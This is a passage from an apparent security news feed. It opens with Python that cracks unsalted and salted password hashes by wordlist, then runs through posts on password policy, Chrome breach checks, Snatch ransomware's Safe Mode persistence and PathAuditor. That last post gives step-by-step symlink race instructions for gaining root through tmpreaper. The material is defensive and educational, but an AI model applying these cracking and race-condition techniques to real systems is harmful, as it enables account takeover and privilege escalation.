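def crack_salted(salt: bytes, digest: bytes, words,
                 iterations: int = DEFAULT_ITERATIONS):
    """No table applies: each salt forces every guess to be recomputed, slowly.
    A weak password in the wordlist still falls, which is why salting
    complements, rather than replaces, a password policy."""
    for w in words:
        if verify_password(w, salt, digest, iterations):
            return w
    return None


if __name__ == "__main__":
    table = build_rainbow_lookup(WORDLIST)
    print("unsalted 'letmein' ->", crack_unsalted(unsalted_hash("letmein"), table))
    salt, digest = hash_password("letmein")
    print("salted   'letmein' ->", crack_salted(salt, digest, WORDLIST))
```

Two different users with the same password get different salted digests, so one precomputed table cannot serve both; the remaining exposure is a guessable password, which is what the policy advice that follows addresses.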

The received wisdom about passwords is that they should have at least eight characters and mix letters, numbers and special characters.

However, this often leads to ridiculously complicated passwords that are hard to remember and, ironically, comparatively easy for computers to crack.

There’s another problem: even though complex passwords are theoretically hard to crack, you may well end up writing them down somewhere, which immediately compromises them.

A simpler and more secure technique is to create a mnemonic or cipher, such as taking the first character from each word of a sentence.

Organisations should create a policy that lists specific requirements for creating passwords and instructs employees to change default passwords when they create accounts. If the account contains sensitive information, organisations should consider using multi-factor or hardware-based tokens in place of system-level passwords.

2. Poorly configured devices

Inexperienced or underfunded organisations often install routers, switches and other networking gear without involving anyone who understands the security ramifications of each device.

Misconfiguration can happen at any level of the application stack, including the code, web and application servers, databases and frameworks.

Here are some signs of a poorly configured device:

  • Default account information: Attackers can easily break into your application if you’ve left your account name as ‘admin’ or ‘test’ and not changed the default password.
  • Third-party applications installed on a production server: A production server with additional applications on it leaves organisations exposed.
  • Ineffective firewalls: If more ports than necessary are open, or if unauthorised hosts can connect to the server, attackers can gain control of the server.
  • Missing operating system security patches: Attackers exploit security holes that published patches have already identified. If you haven’t applied those patches, you are vulnerable.

To avoid making those mistakes, organisations should use a strong application architecture that separates components, create a process for applying software updates and patches as they are released and conduct regular scans and audits to help detect future misconfigurations or missing patches.

3. Insider threats

Employees are often directly responsible for data breaches. These can be broken down into three categories:

  • Malicious actors, who steal or expose data for financial gain, political reasons, revenge, etc.
  • Accidental loss, such as misplacing a removable device.
  • Negligence, where, for reasons other than malice, employees fail to comply with security policies.

It’s hard to identify potential sources of insider error, because everyone in the organisation is susceptible. Accidental loss and negligence can be mitigated by providing your staff with regular awareness courses that remind them of their security obligations.

Preventing malicious actors requires stricter measures, such as:

  • Implementing access controls to limit the amount of information any one employee can view;
  • Creating policies restricting the use of removable devices; and
  • Monitoring unauthorised accounts.

Educate your employees on cyber security risks

Educated and informed employees are your first line of defence when it comes to information security.

Empower them to make better security decisions with our Information Security and Cyber Security Staff Awareness E-Learning Course.

This GCHQ-approved training course gives your employees a comprehensive overview of the threats they face and how to avoid them.


A version of this blog was originally published on 1 December 2017.

The post Don’t gift cyber attackers access to your organisation this Christmas appeared first on IT Governance UK Blog.

Generated Passwords, UX and Security Absolutism


Last month, Disney launched their new streaming service Disney+; "The best stories in the world, all in one place", apparently. The service was obviously rather popular because within days the tech (and mainstream) headlines were proclaiming that thousands of hacked Disney+ accounts were already for sale on hacking forums. This is becoming an alarmingly regular pattern with online services, the cause of which was soon confirmed by Disney:

Disney says that there is “no indication” of a security breach on Disney+, and that the source of the problem might be a so-called “credential stuffing” attack, in which hackers obtain passwords and usernames from Dark Web databases, and then use a brute force method to see if those passwords and usernames will work on new sites as well.

So the root cause is credential reuse. We've all done it at some time or other and the vast, vast majority of online users still do it today. But what if we could stop this attack dead in its tracks? What if one simple design decision in the auth process could completely rule out any chance of ever suffering a credential stuffing attack?


Genius! Absolute genius! So why doesn't every site take away the ability for people to choose their own passwords? Why not just generate the password for them thus completely eradicating password reuse? Because it's an absolutely terrible idea, which brings me to the catalyst for this blog post:

I woke up earlier this week to a flood of tweets pointing me at this one with people aghast at the premise of firstly, storing passwords in plain text and secondly, emailing them out to people:

This is largely a practice of a bygone era and it's increasingly rare to see in modern times (and if you do see it, name and shame over at Plain Text Offenders). But how relevant is this criticism when the passwords are system-generated? Whilst the storage and delivery of the password in plain text certainly smells bad, when it's a (pseudo) random string, the risk is very different to when the user chooses their own secret:

For me, the issue isn't really about the storage and delivery of the password, it's about the practice of generating a password for someone that just doesn't add up. There's a fundamental flaw in the logic which I summarised as follows:

The tweet I quoted linked to a blog post titled Pentesting Training Website Challenges Authentication Best Practices and referenced the infosec community doing much "pitchfork raising". Somehow, despite my joining the conversation late, my single-word tweet featured at the beginning of that post which concluded that:

Practical Pentest Labs makes a great case for innovation and not following the pack in the IT security landscape.

So let's go through the registration process and look at why "the pack" doesn't implement things this way. Registration involves entering a username and email address which then delivers the following to your inbox:


Now, put yourself in the shoes of someone who's just registered - how do you login? Copy and paste the password of course, that's the easy bit. But how do you login next time? Clearly, you're not going to remember the password so you need to record it somewhere, but where? Password manager? Great, which means you also have the ability to do something like this on account creation:


This is 1Password's password generator and I use it for every new account I create so clearly there's no "uniqueness" value to assigning the user a password when you can generate your own strong password anyway. And if you have no password manager? You're not going to write it down because that would be absolutely painful, as would re-typing it on return to the website. In all likelihood you're simply not going to record the password at all which means then doing a password reset. Except it's not a reset, it's a recovery which is why they store it in plain text in the first place:

Now of course there are very well-established patterns for implementing a password reset so this remains a really odd design decision, but it's one that's tangential to the discussion around generating the password. Using the "forgot password" feature as a primary means of authentication was enthusiastically supported by a number of people who joined in on the conversation:

Let's be clear about the first bit: using this feature as a means of recovering access to an account isn't "genius" due to their decision to generate passwords because you can use exactly the same approach with any site that allows you to choose your own password. This is simply using the password reset feature for auth, pure and simple. And it has a heap of issues.

Firstly, it always involves more steps and more time than entering a username and password either from memory or password manager. It's no longer a matter of entering a username and password, it's enter the email address, wait for the email, go to the mail client, click the link, now you're in.

Secondly, "wait for the email" can be a protracted process. We've all had plenty of occasions where mail delivery is delayed and, in this case, that's a blocking process; you simply cannot log back in until the mail comes.

Thirdly, there's junk. Just this morning I discovered all my Disqus notifications were going direct to the spam box:


I don't know if that's Disqus' fault or Office 365's fault, but what I do know is that a whole bunch of legitimate emails were no longer being delivered to my inbox (it wasn't just Disqus either). Now imagine you're dependent on that email simply to access a system you're already registered on - it's painful. Of course, you still need successful email delivery for registration verification and the times you genuinely need to perform an account recovery, but making that a dependency on every single authentication attempt is just nonsensical.

Much of the discussion had on this topic centred around the pain imposed on users choosing passwords:

You can argue this two different ways: On the one hand, manually creating a password that meets what is often arbitrary complexity criteria can be painful, and that's before you even begin listening to that nagging voice in the back of your head saying "also make it unique". On the other hand, passwords are one of the simplest security constructs we have and every single person using the web today understands how to use them. Indeed, this is what keeps human-chosen passwords alive today; just last year I wrote Here's Why [Insert Thing Here] Is Not a Password Killer, where I explained that despite the technical merits of alternate approaches, the simple reason we still use passwords the way we do today is because everyone understands them! It's exactly the same reason why I ended up standing in front of US Congress testifying about the impact of data breaches on knowledge-based authentication; relaying your date of birth as a means of verifying your identity is terrible in terms of security, but it prevails because every single person knows how to do it! You cannot escape these basic security truths and time and time again, usability trumps security.

Which brings me to the "security absolutism" term in the title of this post. Security absolutism - the view that all else is secondary to this one strongly held principle - was rampant throughout the discussion:

This feels like a very sage, grandfatherly thing for me to say, but this is simply not how the world works. If it was, they'd force 2FA on every single user and demand they purchase a U2F key for auth. As it stands, there's not even a self-service means of changing your password:

If security was such an important focus, they wouldn't still be supporting TLS 1.0 and 1.1 (SSL Labs will cap their grade to "B" in a few weeks from now for that faux pas), they'd use DNS CAA and they wouldn't be scoring a failing "F" grade on Security Headers due to no HSTS and no CSP. To be clear, none of these are particularly sensational findings, but the assertion that security is somehow sacrosanct and that everything else must be sacrificed in its pursuit is clearly not what's going on here.

I first used the term security absolutism a few years ago now when writing about responses to folks using Cloudflare to implement HTTPS on their sites. As with this post, I proposed that a myopic focus on security was unhealthy and causes people to miss the many fine nuances involved in protecting online assets whilst still delivering a usable service. For example, this tweet in response to the terrible UX of generating passwords for people:

Clearly this is untrue for Disney and for every other service I can think of that's recently been the victim of credential stuffing (geez that list is getting big). Not a single one I can name has, after being on the receiving end of an attack, turned around and said "You know what? No longer allowing users to choose their own password and instead just assigning one to them sure beats the UX of dealing with a hacked account!". Not. One.

This is also a case where this particular site is by no means a valid reference point for the general online populace. Practical Pentest Labs is targeted at people who want to "take their hacking skills to the next level", which one would assume means the audience is somewhat more security-conscious than your average punter. This audience is better equipped to store secrets such as a generated password but again, they're also more likely to have a password manager in the first place thus negating the uniqueness value proposition of a generated secret.

To be clear, I don't have any personal gripes with Practical Pentest Labs and if this method of auth is working for them then good on 'em, that's their call. But regardless of how much you might like their approach, it's an inescapable reality that their implementation is highly abnormal and that's not by accident - this model is simply a UX nightmare. This approach would completely solve Disney's credential stuffing problem by entirely eradicating password reuse, that part I agree on:

But as for "all sites should generate the user's password", no, you're never going to see it happen at Disney because they actually want customers! This, again, is security absolutism because it places security above and beyond all else and damn the consequences.

By all means, people should robustly debate the merits of alternate auth systems, but you cannot escape the reality that no matter how endorsed you might be in this approach, websites simply don't implement it. There are very good reasons why not and if you're inclined to chime in on the comments section in support of generated passwords, perhaps start with thinking about why this approach is so rarely seen.

Plundervolt! A new Intel Processor ‘undervolting’ Vulnerability

Researchers at the University of Birmingham have identified a weakness in Intel’s processors: by 'undervolting' the CPU, Intel’s secure enclave technology becomes vulnerable to attack.

A little bit of undervolting can cause a lot of problems

Modern processors are being pushed to perform faster than ever before – and with this comes increases in heat and power consumption. To manage this, many chip manufacturers allow frequency and voltage to be adjusted as and when needed – known as ‘undervolting’ or ‘overvolting’. This is done through privileged software interfaces, such as a “model-specific register” in Intel Core processors.

An international team of researchers from the University of Birmingham’s School of Computer Science along with researchers from imec-DistriNet (KU Leuven) and Graz University of Technology has been investigating how these interfaces can be exploited in Intel Core processors to undermine the system’s security in a project called Plundervolt.

Results released today and accepted to IEEE Security & Privacy 2020, show how the team was able to corrupt the integrity of Intel SGX on Intel Core processors by controlling the voltage when executing enclave computations – a method used to shield sensitive computations for example from malware. This means that even Intel SGX's memory encryption and authentication technology cannot protect against Plundervolt.

Intel has already responded to the security threat by supplying a microcode update to mitigate Plundervolt. The vulnerability has a CVSS base score of 7.9 (High) under CVE-2019-11157.

David Oswald, Senior Lecturer in Computer Security at the University of Birmingham, says: “To our knowledge, the weakness we’ve uncovered will only affect the security of SGX enclaves. Intel responded swiftly to the threat and users can protect their SGX enclaves by downloading Intel’s update.”

Better password protections in Chrome – How it works

Today, we announced better password protections in Chrome, gradually rolling out with release M79. Here are the details of how they work.

Warnings about compromised passwords
Google first introduced password breach warnings as a Password Checkup extension early this year. It compares passwords and usernames against over 4 billion credentials that Google knows to have been compromised. You can read more about it here. In October, Google built the Password Checkup feature into the Google Account, making it available from

Chrome’s integration is a natural next step to ensure we protect even more users as they browse the web. Here is how it works:
  • Whenever Google discovers a username and password exposed by another company’s data breach, we store a hashed and encrypted copy of the data on our servers with a secret key known only to Google.
  • When you sign in to a website, Chrome will send a hashed copy of your username and password to Google encrypted with a secret key only known to Chrome. No one, including Google, is able to derive your username or password from this encrypted copy.
  • In order to determine if your username and password appears in any breach, we use a technique called private set intersection with blinding that involves multiple layers of encryption. This allows us to compare your encrypted username and password with all of the encrypted breached usernames and passwords, without revealing your username and password, or revealing any information about any other users’ usernames and passwords. In order to make this computation more efficient, Chrome sends a 3-byte SHA256 hash prefix of your username to reduce the scale of the data joined from 4 billion records down to 250 records, while still ensuring your username remains anonymous.
  • Only you discover if your username and password have been compromised. If they have been compromised, Chrome will tell you, and we strongly encourage you to change your password.
You can control this feature in the “Sync and Google Services” section of Chrome Settings. Enterprise admins can control this feature using the PasswordLeakDetectionEnabled policy setting.
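The blinded exchange described above, as an added example (not Chrome's or Google's code): a toy model in which the multiplicative group modulo the Mersenne prime 2**521 - 1 stands in for the elliptic-curve group the real protocol uses, and the breach corpus is a constructed sample.

```python
import hashlib
import math
import secrets

P = 2**521 - 1    # Mersenne prime; toy group parameter (assumption, not Google's choice)
G = 3             # generator used to map hashes into the group
ORDER = P - 1     # blinding exponents must be invertible modulo the group order


def hash_to_group(data: bytes) -> int:
    """Map arbitrary bytes to a non-zero group element G^SHA256(data) mod P."""
    h = int.from_bytes(hashlib.sha256(data).digest(), "big")
    return pow(G, h, P)


def random_exponent() -> int:
    """Secret exponent coprime to the group order, so it can be inverted later."""
    while True:
        k = secrets.randbelow(ORDER - 2) + 2
        if math.gcd(k, ORDER) == 1:
            return k


def username_prefix(username: str) -> bytes:
    """The 3-byte SHA-256 prefix of the username that selects a server bucket."""
    return hashlib.sha256(username.encode("utf-8")).digest()[:3]


def credential_point(username: str, password: str) -> int:
    """Hash the (username, password) pair into the group."""
    return hash_to_group(f"{username}\x00{password}".encode("utf-8"))


class BreachServer:
    """Google's side: breached credentials stored under a server-only key."""

    def __init__(self, breached_credentials):
        self.key = random_exponent()          # never leaves the server
        self.buckets = {}
        for username, password in breached_credentials:
            prefix = username_prefix(username)
            encrypted = pow(credential_point(username, password), self.key, P)
            self.buckets.setdefault(prefix, []).append(encrypted)

    def lookup(self, prefix: bytes, blinded_credential: int):
        """Apply the server key to the client's blinded value and return it with the bucket.

        The server sees only a 3-byte prefix and a blinded group element, so it
        learns neither the username nor the password being checked.
        """
        doubly_blinded = pow(blinded_credential, self.key, P)
        return doubly_blinded, list(self.buckets.get(prefix, []))


def check_credential(server: BreachServer, username: str, password: str) -> bool:
    """Client (Chrome) side: True if (username, password) is in the breach set."""
    a = random_exponent()                                   # client-only blinding key
    blinded = pow(credential_point(username, password), a, P)
    doubly_blinded, bucket = server.lookup(username_prefix(username), blinded)
    # Strip our own blinding: ((x^a)^b)^(1/a) == x^b, which is exactly the form
    # the server stored for every breached record in the bucket. The client can
    # compare, but cannot recover any other user's credential from x^b.
    a_inverse = pow(a, -1, ORDER)
    server_only_blinded = pow(doubly_blinded, a_inverse, P)
    return server_only_blinded in bucket


if __name__ == "__main__":
    # Constructed sample breach corpus, not real leaked data.
    server = BreachServer([("alice@example.com", "hunter2"),
                           ("bob@example.com", "letmein")])
    print(check_credential(server, "alice@example.com", "hunter2"))        # True
    print(check_credential(server, "alice@example.com", "correct-horse"))  # False
```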

Real-time phishing protection: Checking with Safe Browsing’s blocklist in real time.
Chrome’s new real-time phishing protection is also expanding existing technology — in this case it’s Google’s well-established Safe Browsing.

Every day, Safe Browsing discovers thousands of new unsafe sites and adds them to the blocklists shared with the web industry. Chrome checks the URL of each site you visit or file you download against this local list, which is updated approximately every 30 minutes. If you navigate to a URL that appears on the list, Chrome checks a partial URL fingerprint (the first 32 bits of a SHA-256 hash of the URL) with Google for verification that the URL is indeed dangerous. Google cannot determine the actual URL from this information.

However, we’re noticing that some phishing sites slip through our 30-minute refresh window, either by switching domains very quickly or by hiding from Google's crawlers.

That’s where real-time phishing protections come in. These new protections can inspect the URLs of pages visited with Safe Browsing’s servers in real time. When you visit a website, Chrome checks it against a list stored on your computer of thousands of popular websites that are known to be safe. If the website is not on the safe-list, Chrome checks the URL with Google (after dropping any username or password embedded in the URL) to find out if you're visiting a dangerous site. Our analysis has shown that this results in a 30% increase in protections by warning users on malicious sites that are brand new.

We will be initially rolling out this feature for people who have already opted in to the “Make searches and browsing better” setting in Chrome. Enterprise administrators can manage this setting via the UrlKeyedAnonymizedDataCollectionEnabled policy setting.

Expanding predictive phishing protection
Your password is the key to your online identity and data. If this key falls into the hands of attackers, they can easily impersonate you and get access to your data. We launched predictive phishing protections to warn users who are syncing history in Chrome when they enter their Google Account password into suspected phishing sites that try to steal their credentials.

With this latest release, we’re expanding this protection to everyone signed in to Chrome, even if you have not enabled Sync. In addition, this feature will now work for all the passwords you have stored in Chrome’s password manager.

If you type one of your protected passwords (this could be a password you stored in Chrome’s password manager, or the Google Account password you used to sign in to Chrome) into an unusual site, Chrome classifies this as a potentially dangerous event.

In such a scenario, Chrome checks the site against a list on your computer of thousands of popular websites that are known to be safe. If the website is not on the safe-list, Chrome checks the URL with Google (after dropping any username or password embedded in the URL). If this check determines that the site is indeed suspicious or malicious, Chrome will immediately show you a warning and encourage you to change your compromised password. If it was your Google Account password that was phished, Chrome also offers to notify Google so we can add additional protections to ensure your account isn't compromised.

By watching for password reuse, Chrome can give heightened security in critical moments while minimizing the data it shares with Google. We think predictive phishing protection will protect hundreds of millions more people.

SECURITY ALERT: Snatch Ransomware Reboots Your PC in Safe Mode to Avoid Detection

Ransomware is experiencing a resurgence in the second half of 2019, and it will probably keep growing in 2020. In perhaps the most disturbing ransomware development of the year, a newcomer has developed a novel strategy to bypass Antivirus detection. The Snatch ransomware starts its activity by rebooting Windows computers in Safe Mode.

This allows it to elude Antivirus detection since it only starts behaving like ransomware after rebooting. Unfortunately, most commercial Antivirus programs don’t initialize in Windows Safe Mode, since that type of booting is only used as a temporary state for troubleshooting a malfunctioning system.

It’s not the first time malware has found ways to disable Windows defenses and trick it, but the Snatch ransomware has the potential to be the most damaging attack vector yet. I can’t stress enough the importance of learning about Snatch and taking all defensive measures against it.

How the Snatch Ransomware Works

After the Snatch ransomware successfully infects a computer, it doesn’t begin behaving like ransomware (encrypting files) right away. This would cause it to get detected by whatever Antivirus software the machine is running.

Instead, Snatch exploits a Windows vulnerability which allows it to reboot the system in safe mode. Once it reaches Windows Safe Mode, the ransomware will finally start doing its expected act of encrypting files. Since by that time the Antivirus software is not turned on, it can proceed with encryption uninterrupted.

Even if you get some wind that you might be infected, there’s little chance of eluding it. This is what makes the Snatch ransomware so dangerous and difficult to disinfect.

From the get-go, it will set itself up as a service within the operating system, making sure it will run even during a system reboot. Then, it simply forces that reboot to take place, effectively making sure the playing field is clear of all adversaries (endpoint security solutions such as Antivirus software).

The reason the Snatch ransomware is able to do this is that its creators found a way to exploit a Windows vulnerability. By using a registry key, Snatch can embed itself in the list of services that survive a Safe Mode reboot.

Sophos Labs, the team of researchers who initially discovered this new ransomware behavior, says this is a major public danger. Other ransomware groups could soon borrow the Safe Mode trick, leaving plenty of Antivirus software virtually useless against them.

Since most consumers and businesses sadly rely only on a regular Antivirus for protection (at best), this could lead to successful ransomware attacks on an unprecedented scale.
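A defender-side check for the Safe Mode persistence described above, as an added example (not from the Heimdal post or from Sophos): services and drivers allowed to run in Safe Mode are registered as subkeys under HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal (and \Network), so an entry that is absent from a known-good baseline deserves a look. Both registry exports below are constructed samples in "reg export" format, not data from a real host.

```python
import re

SAFEBOOT_ROOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"

# Constructed baseline: a snapshot assumed to come from a clean build.
BASELINE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppInfo]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"
"""

# Constructed export from the host under investigation: one extra service.
CURRENT_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppInfo]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SuperBackupSvc]
@="Service"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
DEFAULT_VALUE_RE = re.compile(r'^@="(.*)"$')


def parse_safeboot_export(text):
    """Return {mode: {entry_name: default_value}} for SafeBoot\\<mode>\\<entry> keys."""
    entries = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        key_match = KEY_RE.match(line)
        if key_match:
            key = key_match.group(1)
            current = None
            if not key.lower().startswith(SAFEBOOT_ROOT.lower() + "\\"):
                continue
            parts = key[len(SAFEBOOT_ROOT) + 1:].split("\\")
            if len(parts) == 2:          # exactly SafeBoot\<Minimal|Network>\<entry>
                mode, name = parts
                entries.setdefault(mode, {})[name] = None
                current = (mode, name)
            continue
        value_match = DEFAULT_VALUE_RE.match(line)
        if value_match and current:
            mode, name = current
            entries[mode][name] = value_match.group(1)   # "Service", "Driver", ...
    return entries


def find_safeboot_additions(baseline_text, current_text):
    """List (mode, entry, class) tuples present in the current export but not in the baseline."""
    baseline = parse_safeboot_export(baseline_text)
    current = parse_safeboot_export(current_text)
    findings = []
    for mode, names in current.items():
        known = baseline.get(mode, {})
        for name, klass in names.items():
            if name not in known:
                findings.append((mode, name, klass))
    return findings


if __name__ == "__main__":
    for mode, name, klass in find_safeboot_additions(BASELINE_EXPORT, CURRENT_EXPORT):
        print(f"unexpected Safe Mode {klass}: SafeBoot\\{mode}\\{name}")
```

On a live host the inputs come from reg export of the SafeBoot key, with the baseline taken from a known-clean build of the same Windows version.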

More info on the Snatch Ransomware

The ransomware group which created the Snatch ransomware has been active since summer 2018. The Safe Mode trick used by the ransomware now seems to be a recent development, but these guys were clearly remarkable from the start.

They didn’t go after consumer targets (back then) through mass-delivered spam campaigns or browser exploit kits, as most ransomware does. Instead, they focused on high profile, government or corporate targets. Since these targets have the money for bigger payouts, they obviously make more attractive targets for big game hunters like Snatch.

The group has been operating as a business, advertising for affiliate partners and looking for collaborators since last year. Here is an ad from one of the group’s operators (mentioning that they only work with Russian speakers).

[Image: Snatch forum ad looking for affiliates. Photo by Sophos, via ZDNet.]

Especially when targeting large organizations, the Snatch ransomware doesn’t just shoot in the dark. They do their homework really well about who they’re after, much like in the process of spear-phishing.

They buy access to a network or work with other hackers to breach their target’s systems if they can’t get in themselves. Then, they stay silent for weeks and even months, gathering more info, observing and waiting. The ransomware part of the attack only starts to unfold once the Snatch team has covered all their bases and the victory is all but guaranteed.

Furthermore, unlike other ransomware gangs who simply encrypt files and then demand to be paid for the encryption key, Snatch also steals valuable data. The researchers who have been investigating the Snatch ransomware gang found evidence that they also engage in data theft through it.

Thus, even if you pay the ransom to get your files back (a strategy we never recommend, even if it means losing your files), you can later find it leaked and for sale on the dark web.

Coveware, a company that sometimes negotiates ransomware payouts on behalf of the victims, told Sophos that they privately handled 12 payouts for the Snatch infection between July and October 2019. The payments ranged between $2,000 and $35,000. The only publicly known case of Snatch ransomware infection was the web hosting company. So far, the ransomware gang managed to keep a low profile.

How to Stay Safe from the Snatch Ransomware

Priority #1: Get your security straightened out (DNS shields up!)

No matter how good you think your Antivirus solution is, this time it might not cut it. You definitely need to up your game with a DNS traffic filter which helps detect unknown threats and blocks ransomware before it can reach your system.

Unlike reactive solutions like Antivirus software, a proactive solution like our Thor Foresight Enterprise will prevent the ransomware payload from reaching your systems. It will also block numerous other ways that hackers usually employ to get into your systems, too. Essentially, if the Snatch ransomware strain manages to infiltrate your systems, no reactive security solution will be able to help you, no matter how reliable it has been in the past. We are entering a new and more dangerous world of online threats. It’s time to employ security solutions that can keep up with it.

Priority #2: Spread the word and educate your users

No one can afford to stop learning and just leave security to the experts (system admins and so on). Even if you have the best EDR solution out there, distracted and uninformed users can jeopardize all the security efforts.

There’s no way around it anymore: everyone needs to be on their toes and learn more about how contemporary threats work. As these threats evolve and change, so should the best security practices that users must employ in their online activity.

You can get started with our free cybersecurity resources here. It’s simple, actionable advice and no matter how non-technical you are, as long as you read a bit every few days, you’ll be better prepared to handle cyber-emergencies.

The post SECURITY ALERT: Snatch Ransomware Reboots Your PC in Safe Mode to Avoid Detection appeared first on Heimdal Security Blog.

MoJ Reports Over 400% Increase in Lost Laptops in Three Years

Apricorn, the leading manufacturer of software-free, 256-bit AES XTS hardware-encrypted USB drives, today announced new findings from Freedom of Information (FoI) requests submitted to five government departments into the security of devices held by public sector employees. The Ministry of Justice (MoJ) lost 354 mobile phones, PCs, laptops and tablet devices in FY 2018/19 compared with 229 between 2017/2018. The number of lost laptops alone has risen from 45 in 2016/17 to 101 in 2017/18 and up to 201 in 2018/2019, an increase of more than 400% in three years.

FoI requests were submitted to the MoJ, Ministry of Education (MoE), Ministry of Defence (MoD), NHS Digital and NHS England during September-November 2019. Of the five government departments contacted, three responded. The MoE also reported 91 devices lost or stolen in 2019, whilst NHS Digital have lost 35 to date in 2019.

“Whilst devices are easily misplaced, it’s concerning to see such vast numbers being lost and stolen, particularly given the fact these are government departments ultimately responsible for volumes of sensitive public data. A lost device can pose a significant risk to the government if it is not properly protected” said Jon Fielding, Managing Director, EMEA, Apricorn.

When questioned about the use of USB and other storage devices in the workplace, or when working remotely, all three departments confirmed that employees use USB devices. The MoJ added that all USB ports on laptops and desktops are restricted and can only be used when individuals have requested that the ports be unlocked. Each of the responding departments noted that all USB and storage devices are encrypted.

“Modern-day mobile working is designed to support the flexibility and efficiency increasingly required in 21st-century roles, but this also means that sensitive data is often stored on mobile and laptop devices. If a device that is not secured is lost and ends up in the wrong hands, the repercussions can be hugely detrimental, even more so with GDPR now in full force”, noted Fielding.

In a survey by Apricorn earlier this year, roughly a third (32%) of respondents said that their organisation had already experienced a data loss or breach as a direct result of mobile working and to add to this, 30% of respondents from organisations where the General Data Protection Regulation (GDPR) applies were concerned that mobile working is an area that will most likely cause them to be non-compliant.

All responding sectors did confirm that they have security policies in place that cover all mobile, storage and laptop devices.

“Knowing that these government departments have policies in place to protect sensitive data is somewhat reassuring, however, they need to be doing a lot more to avoid the risk of a data breach resulting from these lost devices. Corporately approved, hardware encrypted storage devices should be provided as standard. These should be whitelisted on the IT infrastructure, blocking access to all non-approved media. Should a device then ‘go missing’ the data cannot be accessed or used inappropriately” Fielding added.

About the FoI Requests
The research was conducted through Freedom of Information requests submitted through The requests, submitted between September and November 2019, along with the successful responses can be found at:

GNU Radio Primer

Ray Felch // Disclaimer: Be sure to use a faraday bag or cage before transmitting any data so you don’t accidentally break any laws by illegally transmitting on regulated frequencies. Additionally, intercepting and decrypting someone else’s data is illegal, so be careful when researching your traffic. Preface: Recently, I introduced myself to the world of […]

The post GNU Radio Primer appeared first on Black Hills Information Security.

Optiv Announces New Software Assurance as-a-Service Offering Powered by Veracode

In an effort to help drive collaboration between security, development, and operations, improve speed to market, and ensure software is secure from the start, Optiv has released its new Software Assurance as-a-Service (SAaaS) offering. This program pairs Optiv’s consulting and security services with Veracode’s cloud-based, end-to-end application security solutions to give companies a programmatic approach to DevSecOps.

In today’s world, every company is a software company and, as a result, one of the top attack vectors for software-driven and supported organizations is the application. Just as development teams are increasingly integrating automated security into their workflows, security teams are looking for support to plan, build, and run strong application security programs that deliver on the overarching goals of the business.

Through SAaaS, DevSecOps teams are assisted with detection, analysis, and response to application vulnerabilities with Veracode Static Analysis, Veracode Dynamic Analysis, and Veracode Software Composition Analysis. In order to ensure that the flaws aren’t just found, but also fixed, the Optiv SAaaS solution is inclusive of software assurance expertise for code review, threat modeling, SDLC workshops, architectural review, and program development.

Optiv SAaaS enables modern organizations of all sizes and maturity levels to take advantage of a highly scalable platform and seamless integration to build a customized AppSec program that delivers secure software faster. This offering can help companies empower their development and security teams, lower their security risk, and turn security into a competitive advantage.

Learn more here.

Detecting unsafe path access patterns with PathAuditor

cat /home/user/foo

What can go wrong if this command runs as root? Does it change anything if foo is a symbolic link to /etc/shadow? How is the output going to be used?

Depending on the answers to the questions above, accessing files this way could be a vulnerability. The vulnerability exists in syscalls that operate on file paths, such as open, rename, chmod, or exec. For a vulnerability to be present, part of the path has to be user controlled and the program that executes the syscall has to be run at a higher privilege level. In a potential exploit, the attacker can substitute the path for a symlink and create, remove, or execute a file. In many cases, it's possible for an attacker to create the symlink before the syscall is executed.

At Google, we have been working on a solution to find these potentially problematic issues at scale: PathAuditor. In this blog post we'll outline the problem and explain how you can avoid it in your code with PathAuditor.

Let’s take a look at a real world example. The tmpreaper utility contained the following code to check if a directory is a mount point:
if ((dst = malloc(strlen(ent->d_name) + 3)) == NULL)
    message (LOG_FATAL, "malloc failed.\n");
strcpy(dst, ent->d_name);
strcat(dst, "/X");
rename(ent->d_name, dst);   /* both arguments resolved separately by the kernel */
if (errno == EXDEV) {       /* EXDEV means the two paths are on different filesystems */

This code will call rename("/tmp/user/controlled", "/tmp/user/controlled/X"). Under the hood, the kernel will resolve the path twice, once for the first argument and once for the second, then perform some checks if the rename is valid and finally try to move the file from one directory to the other.

However, the problem is that the user can race the kernel code and replace the “/tmp/user/controlled” with a symlink just between the two path resolutions.

A successful attack would look roughly like this:
  • Make “/tmp/user/controlled” a file with controlled content.
  • The kernel resolves that path for the first argument to rename() and sees the file.
  • Replace “/tmp/user/controlled” with a symlink to /etc/cron.
  • The kernel resolves the path again for the second argument and ends up in /etc/cron.
  • If both the tmp and cron directories are on the same filesystem, the kernel will move the attacker controlled file to /etc/cron, leading to code execution as root.
Can we find such bugs via automated analysis? Well, yes and no. As shown in the tmpreaper example, exploiting these bugs can require some creativity and it depends on the context if they’re vulnerabilities in the first place. Automated analysis can uncover instances of this access pattern and will gather as much information as it can to help with further investigation. However, it will also naturally produce false positives.

We can’t tell if a call to open(/user/controlled, O_RDONLY) is a vulnerability without looking at the context. It depends on whether the contents are returned to the user or are used in some security sensitive way. A call to chmod(/user/controlled, mode) depending on the mode can be either a DoS or a privilege escalation. Accessing files in sticky directories (like /tmp) can become vulnerabilities if the attacker found an additional bug to delete arbitrary files.

How PathAuditor works

To find issues like this at scale we wrote PathAuditor, a tool that monitors file accesses and logs potential vulnerabilities. PathAuditor is a shared library that can be loaded into processes using LD_PRELOAD. It then hooks all filesystem related libc functions and checks if the access is safe. For that, we traverse the path and check if any component could be replaced by an unprivileged user, for example if a directory is user-writable. If we detect such a pattern, we log it to syslog for manual analysis.

Here's how you can use it to find vulnerabilities in your code:
